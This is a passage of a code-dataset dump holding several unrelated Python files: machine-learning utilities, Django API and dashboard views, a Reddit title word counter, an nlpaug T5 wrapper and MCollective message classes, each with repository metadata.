tfidf.transform(df['Content_Parsed_6']).toarray()\n \n return features\n\n\ndef get_category_name(category_id):\n for category, id_ in category_codes.items(): \n if id_ == category_id:\n return category\n\ndef predict_from_features(features):\n \n # Obtain the highest probability of the predictions for each article\n predictions_proba = svc_model.predict_proba(features).max(axis=1) \n \n # Predict using the input model\n predictions_pre = svc_model.predict(features)\n\n # Replace prediction with 6 if associated cond. probability less than threshold\n predictions = []\n\n for prob, cat in zip(predictions_proba, predictions_pre):\n if prob > .65:\n predictions.append(cat)\n else:\n predictions.append(5)\n\n # Return result\n categories = [get_category_name(x) for x in predictions]\n \n return categories\n\ndef complete_df(df, categories):\n try:\n df['Prediction'] = categories\n except Exception as ex:\n print(\"Exception\", ex, len(df), len(categories))\n finally:\n df['Prediction'] = \"other\"\n\n return df", "sub_path": "06. App Creation/Utilities.py", "file_name": "Utilities.py", "file_ext": "py", "file_size_in_byte": 3813, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "pickle.load", "line_number": 24, "usage_type": "call"}, {"api_name": "pickle.load", "line_number": 29, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords.words", "line_number": 41, "usage_type": "call"}, {"api_name": "nltk.corpus.stopwords", "line_number": 41, "usage_type": "name"}, {"api_name": "nltk.stem.WordNetLemmatizer", "line_number": 58, "usage_type": "call"}]} {"seq_id": "274072828", "text": "import sklearn.svm\r\nimport numpy\r\nimport argparse\r\n\r\n\r\ndef parse_file(file):\r\n\tf = open(file, 'r+')\r\n\tsamples = [(line[-1] == '\\n' and line[:-1] or line).decode('utf-8').split('\\t') for line in f if line[0] != '#']\r\n\tfeatures = [[int(feature) for feature in sample[1:]] for sample in samples]\r\n\tclasses = [(sample[0] == u\"male\" and 1 or -1) for sample in samples]\r\n\treturn features, classes\r\n\r\n\t\r\ndef get_features(files):\r\n\tfeatures = []\r\n\tclasses = []\r\n\tfor file in files:\r\n\t\tfile_features, file_classes = parse_file(file)\r\n\t\tfeatures.extend(file_features)\r\n\t\tclasses.extend(file_classes)\r\n\treturn features, classes\r\n\t\r\n\t\r\ndef parse_args():\r\n\tparser = argparse.ArgumentParser(description = 'SVM friends gender predictor')\r\n\tparser.add_argument('input_files', metavar='IN', type=str, nargs='+', help='input files to use')\r\n\treturn parser.parse_args()\r\n\r\n\t\t\r\nclass GenderPredictor(object):\r\n\t\r\n\tdef __init__(self):\r\n\t\tself.clf = sklearn.svm.SVC()\r\n\t\t\r\n\tdef fit(self, features, classes):\r\n\t\tself.clf.fit(features, classes)\r\n\t\t\r\n\tdef predict(self, features):\r\n\t\treturn self.clf.predict(features).tolist()\r\n\t\t\r\n\tdef test(self, predictions, classes):\r\n\t\tprint(\"Predicted classes:\")\r\n\t\tprint(predictions)\r\n\t\tprint(\"Real classes:\")\r\n\t\tprint(classes)\r\n\t\tsucceed = len([prediction for prediction, clas in zip(predictions, classes) if prediction == clas])\r\n\t\ttotal = len(classes)\r\n\t\taccuracy = 1.0 * succeed / total * 100\r\n\t\tprint(\"Accuracy: \"\t+ str(succeed) + \" succeed of \" + str(total) + \" total (\" + str(accuracy) + \"%)\")\r\n\t\treturn accuracy\r\n\r\n\tdef split_for_testing(self, features, classes):\r\n\t\tprint (len(classes))\r\n\t\ttests = len(classes) / 4\r\n\t\treturn ({\"features\":features[tests:], \"classes\":classes[tests:]},\r\n\t\t\t\t{\"features\":features[:tests], \"classes\":classes[:tests]})\r\n\r\ndef main():\r\n\targs = parse_args()\r\n\tfeatures, classes = get_features(args.input_files)\r\n\tmodel = GenderPredictor()\r\n\ttrainers, testers = model.split_for_testing(features, classes)\r\n\tmodel.fit(trainers[\"features\"], trainers[\"classes\"])\r\n\tpredictions = model.predict(testers[\"features\"])\r\n\tmodel.test(predictions, testers[\"classes\"])\r\n\t\r\n\r\nif __name__ == \"__main__\":\r\n\tmain()\r\n", "sub_path": "fb_svm/svm.py", "file_name": "svm.py", "file_ext": "py", "file_size_in_byte": 2149, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "argparse.ArgumentParser", "line_number": 25, "usage_type": "call"}, {"api_name": "sklearn.svm.svm.SVC", "line_number": 33, "usage_type": "call"}, {"api_name": "sklearn.svm.svm", "line_number": 33, "usage_type": "attribute"}, {"api_name": "sklearn.svm", "line_number": 33, "usage_type": "name"}]} {"seq_id": "567418054", "text": "# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Fri Oct 18 11:00:20 2019\r\n\r\n@author: Adit\r\n\"\"\"\r\n\r\n## Memotong Sinyal pada Node(Detik Ke-2)\r\n\r\nimport wfdb\r\nfrom matplotlib import pyplot as plt\r\nimport numpy as np\r\n\r\nrecord = wfdb.rdrecord('Sinyal/101')\r\nrecord_dict = record.__dict__\r\nsinyal = record_dict['p_signal'][:,0]\r\n\r\nsinyal_satu_detik = sinyal\r\n\r\nfig,ax1 = plt.subplots(nrows=1)\r\nax1.plot(np.arange(720),signal[:720])\r\nplt.savefig('Sinyal.jpg')", "sub_path": "ISYSRG BATCH 2_MRizkyAdityaUtama.py", "file_name": "ISYSRG BATCH 2_MRizkyAdityaUtama.py", "file_ext": "py", "file_size_in_byte": 445, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "wfdb.rdrecord", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 20, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 20, "usage_type": "name"}, {"api_name": "numpy.arange", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.savefig", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}]} {"seq_id": "156104490", "text": "import json\nimport ssl\nimport requests\n\nfrom django.conf import settings\nfrom rest_framework.decorators import api_view, permission_classes\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\ncontext = ssl._create_unverified_context()\n\n@api_view()\n@permission_classes((IsAuthenticated,))\ndef evaluate_calories(request):\n profile = request.user.profile\n data = {\n \"query\": request.query_params.get('query'),\n \"gender\": 'male',\n \"weight_kg\": profile.weight / 2.205,\n \"height_cm\": profile.height,\n \"age\": profile.age\n }\n\n if request.query_params.get('query') is not None:\n a = prepare_nutritionix_request('/natural/exercise', data)\n obj = json.loads(a.text)\n\n total_calories = 0\n exercises = []\n for exercise in obj['exercises']:\n total_calories += exercise['nf_calories']\n exercises.append(exercise['name'])\n return Response({\n 'calories': total_calories,\n 'exercises': exercises\n })\n\n return Response({})\n\n\n@api_view()\n@permission_classes((IsAuthenticated,))\ndef evaluate_nutrients(request):\n data = {\n \"query\": request.query_params.get('query'),\n \"timezone\": \"PDT\"\n }\n\n if request.query_params.get('query') is not None:\n a = prepare_nutritionix_request('/natural/nutrients', data)\n obj = json.loads(a.text)\n\n total_calories, total_fat, total_carb, total_protein = 0, 0, 0, 0\n ingredients = []\n for ingredient in obj['foods']:\n total_calories += ingredient['nf_calories']\n total_carb += ingredient['nf_total_carbohydrate']\n total_fat += ingredient['nf_total_fat']\n total_protein += ingredient['nf_protein']\n\n ingredients.append({\n \"name\": ingredient['food_name'],\n \"quantity\": ingredient['serving_qty'],\n \"protein\": ingredient['nf_protein'],\n \"carb\": ingredient['nf_total_carbohydrate'],\n \"fat\": ingredient['nf_total_fat'],\n \"calories\": ingredient['nf_calories']\n })\n return Response({\n 'calories': total_calories,\n 'fat': total_fat,\n 'carb': total_carb,\n 'protein': total_protein,\n 'foods': ingredients\n })\n\n return Response({})\n\n\ndef prepare_nutritionix_request(url, data=None):\n headers = {\n 'x-app-id': settings.NUTRIONIX_APP_ID,\n 'x-app-key': settings.NUTRIONIX_APP_KEY,\n 'x-remote-user-id': settings.NUTRIONIX_USER_ID,\n 'x-user-jwt': settings.NUTRIONIX_TOKEN\n }\n\n if data is not None:\n r = requests.post(settings.NUTRIONIX_URL + url, data, headers=headers)\n else:\n r = requests.get(settings.NUTRIONIX_URL + url, headers=headers)\n return r\n\n\ndef is_connected(response):\n return True", "sub_path": "global_api/functions_view.py", "file_name": "functions_view.py", "file_ext": "py", "file_size_in_byte": 2924, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "ssl._create_unverified_context", "line_number": 10, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 26, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 33, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 38, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 12, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 13, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 13, "usage_type": "name"}, {"api_name": "json.loads", "line_number": 51, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 69, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 77, "usage_type": "call"}, {"api_name": "rest_framework.decorators.api_view", "line_number": 41, "usage_type": "call"}, {"api_name": "rest_framework.decorators.permission_classes", "line_number": 42, "usage_type": "call"}, {"api_name": "rest_framework.permissions.IsAuthenticated", "line_number": 42, "usage_type": "name"}, {"api_name": "django.conf.settings.NUTRIONIX_APP_ID", "line_number": 82, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 82, "usage_type": "name"}, {"api_name": "django.conf.settings.NUTRIONIX_APP_KEY", "line_number": 83, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 83, "usage_type": "name"}, {"api_name": "django.conf.settings.NUTRIONIX_USER_ID", "line_number": 84, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 84, "usage_type": "name"}, {"api_name": "django.conf.settings.NUTRIONIX_TOKEN", "line_number": 85, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 85, "usage_type": "name"}, {"api_name": "requests.post", "line_number": 89, "usage_type": "call"}, {"api_name": "django.conf.settings.NUTRIONIX_URL", "line_number": 89, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 89, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 91, "usage_type": "call"}, {"api_name": "django.conf.settings.NUTRIONIX_URL", "line_number": 91, "usage_type": "attribute"}, {"api_name": "django.conf.settings", "line_number": 91, "usage_type": "name"}]} {"seq_id": "562328590", "text": "from sklearn import linear_model\nimport pandas as pd\nimport sys\nsys.path.append('../')\nfrom lib.prediction import show_trajectories\nfrom matplotlib import pyplot as plt\nfrom sklearn.model_selection import train_test_split\n\ndef learn_and_show_no_test(regressor_x, regressor_y, data_to_learn, trajectory):\n \"\"\"\n\n :param regressor_x: regressor for x coordinate\n :param regressor_y: regressor for y coordinate\n :param data_to_learn: df with some data to learn\n :param trajectory: column with lables to learn\n :return: predicted trajectory\n \"\"\"\n regressor_x.fit(data_to_learn, trajectory.x)\n regressor_y.fit(data_to_learn, trajectory.y)\n # making prredictions\n predictions_x = regressor_x.predict(data_to_learn)\n predictions_y = regressor_y.predict(data_to_learn)\n\n # creating data_output to pass to plotter and scorer\n d = {'x': predictions_x,\n 'y': predictions_y,\n 'tmsp': data_to_learn.tmsp.values.tolist()\n }\n trajectory_pred = pd.DataFrame(data=d)\n\n # the plotter given by authors can't deal with shuffled data\n _ = plt.plot(trajectory.x.values, trajectory.y.values, c='blue', label='Trajectory')\n _ = plt.plot(trajectory_pred.x.values, trajectory_pred.y.values, c='red', label='Predicted')\n legend = plt.legend(shadow=True, fontsize='medium', loc='upper right')\n plt.title('predicted and test trajectorys')\n plt.xlabel('x')\n plt.ylabel('y')\n plt.show()\n\n # if we are working with linear regressor from sklearn lwe are to look at coefficients\n if str(type(regressor_x)) == \"\":\n print('x_predictor:')\n for pair in zip(data_to_learn.columns, regressor_x.coef_):\n print(pair)\n\n print('y_predictor:')\n for pair in zip(data_to_learn.columns, regressor_y.coef_):\n print(pair)\n\n figure, scores = show_trajectories(trajectory, trajectory_pred)\n print(scores)\n\n return trajectory_pred\n\n\ndef learn_test_train(predictor_x, predictor_y, shuffle, test_size, data_to_learn, trajectory):\n \"\"\"\n the function learn given predictors on data_to_learn. to make tests we use sklearn test_train_split\n and test_size and Shuffle are to be given\n :param predictor_x: regressor for x coordinate\n :param predictor_y: regressor for y coordinate\n :param shuffle: should we shuffle the test? (True/False)\n :param test_size: test size from [0, 1]\n :param data_to_learn: df with some data to learn\n :param trajectory: column with lables to learn\n :return:\n \"\"\"\n (X_train,\n X_test,\n x_train, x_test) = train_test_split(data_to_learn, trajectory.x,\n test_size=test_size,\n random_state=0,\n shuffle=shuffle\n )\n (Y_train,\n Y_test,\n y_train, y_test) = train_test_split(data_to_learn, trajectory.y,\n test_size=test_size,\n random_state=0,\n shuffle=shuffle\n )\n\n predictor_x.fit(X_train, x_train)\n predictor_y.fit(Y_train, y_train)\n\n predictions_x = predictor_x.predict(X_test)\n predictions_y = predictor_y.predict(Y_test)\n\n # creating data_output to pass to plotter and scorer\n d = {'x': predictions_x,\n 'y': predictions_y,\n 'tmsp': Y_test.tmsp.values.tolist()\n }\n trajectory_pred = pd.DataFrame(data=d)\n\n d = {'x': x_test,\n 'y': y_test,\n 'tmsp': Y_test.tmsp.values.tolist()\n }\n trajectory_test = pd.DataFrame(data=d)\n\n # the plotter given by authors can't deal with shuffled data\n if str(type(predictor_x)) == \"\":\n print('x_predictor:')\n for pair in zip(data_to_learn.columns, predictor_x.coef_):\n print(pair)\n\n print('y_predictor:')\n for pair in zip(data_to_learn.columns, predictor_y.coef_):\n print(pair)\n # the plotter given by authors can't deal with shuffled data\n _ = plt.scatter(x_test, y_test, s=0.5, c='blue', label='Test')\n _ = plt.scatter(trajectory_pred.x.values, trajectory_pred.y.values, s=1, c='red', label='Predicted')\n legend = plt.legend(shadow=True, fontsize='medium', loc='upper right')\n plt.title('test and predicted trajectory')\n plt.xlabel('x')\n plt.ylabel('y')\n plt.show()\n\n _ = plt.scatter(x_train, y_train, s=1, c='red', label='Train')\n _ = plt.scatter(trajectory_pred.x.values, trajectory_pred.y.values, s=1, c='green', label='Predicted')\n legend = plt.legend(shadow=True, fontsize='medium', loc='upper right')\n plt.title('train and predicted trajectory')\n plt.xlabel('x')\n plt.ylabel('y')\n plt.show()\n\n figure, scores = show_trajectories(trajectory_test, trajectory_pred)\n print(scores)\n\n", "sub_path": "trajectory_prediction/lib/learning_and_testing.py", "file_name": "learning_and_testing.py", "file_ext": "py", "file_size_in_byte": 4996, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "0", "api": [{"api_name": "sys.path.append", "line_number": 4, "usage_type": "call"}, {"api_name": "sys.path", "line_number": 4, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 29, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 34, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 35, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 35, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "lib.prediction.show_trajectories", "line_number": 50, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 70, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 77, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 94, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 100, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 112, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 112, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 113, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 113, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 114, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 114, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 115, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 115, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 116, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 116, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 117, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 117, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 118, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 118, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 120, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 120, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 121, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 121, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 122, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 122, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 123, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 123, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 124, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 124, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 125, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 125, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 126, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 126, "usage_type": "name"}, {"api_name": "lib.prediction.show_trajectories", "line_number": 128, "usage_type": "call"}]} {"seq_id": "243504672", "text": "#!/usr/bin/python3\n\"\"\"\nDefines recursive function to query the Reddit API,\nparse titles of all hot articles, and print sorted count\n\"\"\"\n\n\ndef count_words(subreddit, word_list, after=None, count={}):\n \"\"\"\n Queries the Reddit API, parses titles of all hot articles,\n and prints sorted count\n\n parameters:\n subreddit: subreddit to query for hot articles\n word_list: list of keywords to count\n after: indicates next starting point to get data after\n count: dictionary of current count of keyword\n \"\"\"\n import json\n import requests\n if after is None:\n sub_URL = 'https://www.reddit.com/r/{}/hot.json'.format(subreddit)\n else:\n sub_URL = 'https://www.reddit.com/r/{}/hot.json?after={}'.format(\n subreddit, after)\n subreddit_info = requests.get(sub_URL,\n headers={\"user-agent\": \"user\"},\n allow_redirects=False)\n for word in word_list:\n word = word.lower()\n if word not in count.keys():\n count[word] = 0\n try:\n data = subreddit_info.json().get(\"data\")\n except:\n return\n children = data.get(\"children\")\n for child in children:\n title = (child.get(\"data\").get(\"title\").lower())\n title = title.split(' ')\n for word in word_list:\n word = word.lower()\n count[word] += title.count(word)\n after = data.get(\"after\")\n if after is not None:\n return count_words(subreddit, word_list, after, count)\n result = []\n for k in count.keys():\n if count[k] != 0:\n if result == []:\n result.append(\"{}: {}\".format(k, count[k]))\n else:\n for i in range(len(result)):\n if count[k] > int(result[i].split(' ')[1]):\n result = result[:i] + \\\n [\"{}: {}\".format(k, count[k])] + \\\n result[i:]\n break\n elif count[k] == int(result[i].split(' ')[1]):\n alpha_list = [k, result[i].split(' ')[0]]\n j = 1\n if (i + j) >= len(result):\n continue\n while count[k] == int(result[i + j].split(' ')[1]):\n alpha_list.append(result[i + j].split(' ')[0])\n alpha_list = alpha_list.sort\n for j in range(len(alpha_list)):\n if k == alpha_list[j]:\n result = result[:i + j] + \\\n [\"{}: {}\".format(k, count[k])] + \\\n result[i + j:]\n else:\n continue\n else:\n result.append(\"{}: {}\".format(k, count[k]))\n if result != []:\n for printing in result:\n print(printing)\n", "sub_path": "0x13-count_it/0-count.py", "file_name": "0-count.py", "file_ext": "py", "file_size_in_byte": 2974, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "requests.get", "line_number": 26, "usage_type": "call"}]} {"seq_id": "474779662", "text": "import logging\n\ntry:\n import torch\n from transformers import AutoModelForSeq2SeqLM, AutoTokenizer\nexcept ImportError:\n # No installation required if not using this function\n pass\n\nfrom nlpaug.model.lang_models import LanguageModels\n\nimport nlpaug.util.text.tokenizer as text_tokenizer\n\n\nclass T5(LanguageModels):\n # https://arxiv.org/pdf/1910.10683.pdf\n\n def __init__(self, model_path='t5-base', min_length=10, max_length=20, num_beam=3, no_repeat_ngram_size=3, \n device='cuda', silence=True):\n super().__init__(device, temperature=None, top_k=None, top_p=None, silence=True)\n try:\n import transformers\n except ModuleNotFoundError:\n raise ModuleNotFoundError('Missed transformers library. Install transfomers by `pip install transformers`')\n\n self.model_path = model_path\n self.min_length = min_length\n self.max_length = max_length\n self.num_beam = num_beam\n self.no_repeat_ngram_size = no_repeat_ngram_size\n\n self.tokenizer = AutoTokenizer.from_pretrained(model_path)\n if silence:\n # Transformers thrown an warning regrading to weight initialization. It is expected\n orig_log_level = logging.getLogger('transformers.' + 'modeling_utils').getEffectiveLevel()\n logging.getLogger('transformers.' + 'modeling_utils').setLevel(logging.ERROR)\n self.model = AutoModelForSeq2SeqLM.from_pretrained(model_path)\n logging.getLogger('transformers.' + 'modeling_utils').setLevel(orig_log_level)\n\n self.model.to(self.device)\n self.model.eval()\n\n self.text_prefix = 'summarize: '\n self.return_tensor = 'pt' # PyTorch\n self.early_stopping = True\n self.skip_special_token = True\n self.default_max_length_ratio = 0.5\n\n def predict(self, text, n=1):\n # Convert to feature\n token_ids = self.tokenizer.encode(self.text_prefix + text, return_tensors=self.return_tensor)\n\n # Prediction\n min_length = self.get_min_length(text)\n max_length = self.get_max_length(text)\n target_token_ids = self.model.generate(token_ids,\n min_length=min_length, max_length=max_length, num_beams=self.num_beam,\n no_repeat_ngram_size=self.no_repeat_ngram_size)\n\n tokens = self.tokenizer.decode(target_token_ids[0], skip_special_tokens=self.skip_special_token)\n\n # Return full sentence only.\n for i in range(len(tokens)-1, -1, -1):\n if tokens[i] in text_tokenizer.SENTENCE_SEPARATOR:\n return tokens[:i+1]\n\n return tokens\n\n def get_min_length(self, text):\n return int(len(text) * self.min_length) if self.min_length < 1 else self.min_length\n\n def get_max_length(self, text):\n if self.max_length < 1:\n return int(len(text) * self.max_length)\n else:\n if len(text) >= self.max_length:\n return int(len(text) * self.default_max_length_ratio)\n else:\n return self.max_length\n", "sub_path": "nlpaug/model/lang_models/t5.py", "file_name": "t5.py", "file_ext": "py", "file_size_in_byte": 3052, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "nlpaug.model.lang_models.LanguageModels", "line_number": 15, "usage_type": "name"}, {"api_name": "transformers.AutoTokenizer.from_pretrained", "line_number": 32, "usage_type": "call"}, {"api_name": "transformers.AutoTokenizer", "line_number": 32, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 35, "usage_type": "call"}, {"api_name": "logging.getLogger", "line_number": 36, "usage_type": "call"}, {"api_name": "logging.ERROR", "line_number": 36, "usage_type": "attribute"}, {"api_name": "transformers.AutoModelForSeq2SeqLM.from_pretrained", "line_number": 37, "usage_type": "call"}, {"api_name": "transformers.AutoModelForSeq2SeqLM", "line_number": 37, "usage_type": "name"}, {"api_name": "logging.getLogger", "line_number": 38, "usage_type": "call"}, {"api_name": "nlpaug.util.text.tokenizer.SENTENCE_SEPARATOR", "line_number": 64, "usage_type": "attribute"}, {"api_name": "nlpaug.util.text.tokenizer", "line_number": 64, "usage_type": "name"}]} {"seq_id": "191512650", "text": "'''pymco messaging objects'''\nimport collections\nimport hashlib\nimport time\n\nimport six\n\nfrom . import exc\n\n\nclass Filter(collections.Mapping):\n '''Provides MCollective filters for pymco. This class implements\n :py:class:`collections.Mapping` interface, so it can be used as non mutable\n mapping (read only dict), but mutable using provided add methods. So that,\n for adding the agent you can just use :py:meth:`add_agent`::\n\n filter.add_agent('package')\n '''\n def __init__(self):\n self._filter = {\n 'cf_class': [],\n 'agent': [],\n 'fact': [],\n 'identity': [],\n 'compound': [],\n }\n\n def add_cfclass(self, klass):\n '''Adds new classes/recipes/cookbooks/roles applied by your\n configuration management system.'''\n self._filter['cf_class'].append(klass)\n return self\n\n def add_agent(self, agent):\n '''Adds new agents'''\n self._filter['agent'].append(agent)\n return self\n\n def add_fact(self, fact, value, operator=None):\n '''Adds new facts'''\n toappend = {':fact': fact, ':value': value}\n if operator:\n if not operator in ('==', '=~', '<=', '=>', '>=', '=<', '>', '<',\n '!='):\n raise exc.BadFilterFactOperator(\n 'Unsuppoerted operator {0}'.format(operator))\n toappend[':operator'] = operator\n self._filter['fact'].append(toappend)\n return self\n\n def add_identity(self, identity):\n '''Adds new identities'''\n self._filter['identity'].append(identity)\n return self\n\n def __getitem__(self, key):\n return self._filter[key]\n\n def __len__(self):\n return len(self._filter)\n\n def __iter__(self):\n return six.iterkeys(self._filter)\n\n\nclass Message(collections.MutableMapping):\n '''Provides MCollective messages for pymco. This class implements\n :py:class:`collections.MutableMapping` interface, so it can be used as\n read/write mapping (dictionary).'''\n def __init__(self, body, agent, config, filter_=None, **kwargs):\n if not filter_:\n filter_ = Filter()\n\n self._message = {}\n try:\n self._message[':senderid'] = config['identity']\n self._message[':collective'] = (kwargs.get('collective', None) or\n config['main_collective'])\n except KeyError as error:\n raise exc.ImproperlyConfigured(error)\n self._message[':msgtime'] = int(time.time())\n self._message[':ttl'] = (kwargs.get('ttl', None) or\n config.getint('ttl', default=60))\n self._message[':requestid'] = hashlib.sha1(\n str(self._message[':msgtime']).encode('utf-8')).hexdigest()\n self._message[':body'] = body\n self._message[':agent'] = agent\n self._message[':filter'] = dict(filter_)\n\n def __len__(self):\n return len(self._message)\n\n def __iter__(self):\n return six.iterkeys(self._message)\n\n def __getitem__(self, key):\n return self._message[key]\n\n def __setitem__(self, key, value):\n if not key.startswith(':'):\n raise ValueError('Keys must start with `:`, as Ruby symbols.')\n\n if key == ':filter':\n value = dict(value)\n self._message[key] = value\n\n def __delitem__(self, key):\n del self._message[key]\n", "sub_path": "pymco/message.py", "file_name": "message.py", "file_ext": "py", "file_size_in_byte": 3470, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "12", "api": [{"api_name": "collections.Mapping", "line_number": 11, "usage_type": "attribute"}, {"api_name": "six.iterkeys", "line_number": 63, "usage_type": "call"}, {"api_name": "collections.MutableMapping", "line_number": 66, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 81, "usage_type": "call"}, {"api_name": "hashlib.sha1", "line_number": 84, "usage_type": "call"}, {"api_name": "six.iterkeys", "line_number": 94, "usage_type": "call"}]} {"seq_id": "532102261", "text": "from django.http import HttpResponse\nfrom django.shortcuts import render_to_response\nfrom django.template import RequestContext,loader,Context\nimport Query\nimport Constant\nimport dummydata\nfrom gaesessions import get_current_session\nimport logging\nfrom google.appengine.ext import ndb\ndef get_not_recently_loggedin(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n notrecentlydict =Query.get_students_not_logged_in_by_class(teacherkey)\n logging.error('sbxjks' )\n logging.error(notrecentlydict)\n t = loader.get_template('Dashboard/not_recently_logged_in_all')\n c = Context({'notrecentlylogin': notrecentlydict,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\n\ndef mastery_by_student_by_class(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n mastery_by_student = Query.get_mastery_by_student_of_class(teacherkey)\n\n t = loader.get_template('Dashboard/teacher_mastery_by_student')\n c = Context({'mastery_by_student':mastery_by_student ,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_not_recently_loggedin_all(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n notrecentlyloggedin = Query.get_students_not_logged_in_of_all_class(teacherkey)\n logging.error(notrecentlyloggedin)\n t = loader.get_template('Dashboard/not_recently_logged_in_all')\n c = Context({'notrecentlyloginall': notrecentlyloggedin,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef getaveragemasterybysubjectallclass(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n averagemasterybysubject = Query.get_average_mastery_by_subject_of_all_class(teacherkey)\n logging.error(averagemasterybysubject)\n t = loader.get_template('Dashboard/averagemasterybysubject_allclass.xml')\n c = Context({'averagemasterydict': averagemasterybysubject,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_classes_of_teacher(request):\n session = get_current_session()\n teacherkey = session.get('teacherkey',-1)\n classdetails = Query.get_class_details_of_teacher(teacherkey)\n\n t = loader.get_template('Dashboard/getclassdetails_byteacher')\n c = Context({'getclassdetailsdict': classdetails,})\n return HttpResponse(t.render(c),content_type=\"text/xml\")\n\ndef get_students_not_logged_in_by_class(request):\n session = get_current_session()\n teacherkey = 